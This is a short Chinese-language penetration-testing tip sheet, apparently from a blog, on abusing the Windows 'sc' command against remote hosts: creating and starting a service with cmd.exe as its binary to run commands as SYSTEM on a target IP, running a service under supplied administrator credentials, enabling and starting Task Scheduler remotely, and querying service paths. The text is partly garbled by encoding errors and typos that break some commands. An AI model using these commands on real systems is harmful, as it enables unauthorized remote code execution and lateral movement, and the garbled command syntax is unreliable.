sc 在滲透中常用的功能有三個,遠程執(zhí)行東西,遠程開啟/關(guān)閉服務(wù),查服務(wù)的信息,如服務(wù)的exe路徑。
1.1 執(zhí)行命令(系統(tǒng)權(quán)限): //其他執(zhí)行命令方法參考:http://bra.adminsec.com/security/787.html sc 10.1.1.1 create winnt binpath= c:cmd.exe sc 10.1.1.1 start winnt sc 10.1.1.1 delete winnt 1.2 執(zhí)行命令(指定用戶權(quán)限) sc 10.1.1.1 create adminsec binpath = "c:pass.exe" obj= "adminsecadministrator" passwrod= adminsec sc ip start testsrvname 2、 遠程開啟/關(guān)閉服務(wù),如啟動計劃任務(wù)。感覺at執(zhí)行東西比sc兼容更好。 sc.exe 10.1.1.1 config schedule start= auto //注意=后面有個空格,有時候不anto開啟不成功。 sc.exe 10.1.1.1 start "schedule" 關(guān)閉某個服務(wù): sc getkeyname "Task Scheduler" //獲取服務(wù)名 sc stop "Schedule" 其他技巧,如需要獲取某個服務(wù)的執(zhí)行文件路徑。 sc qc schedule PS: sc要注意的是服務(wù)名和顯示名,這2個是不同的概念
|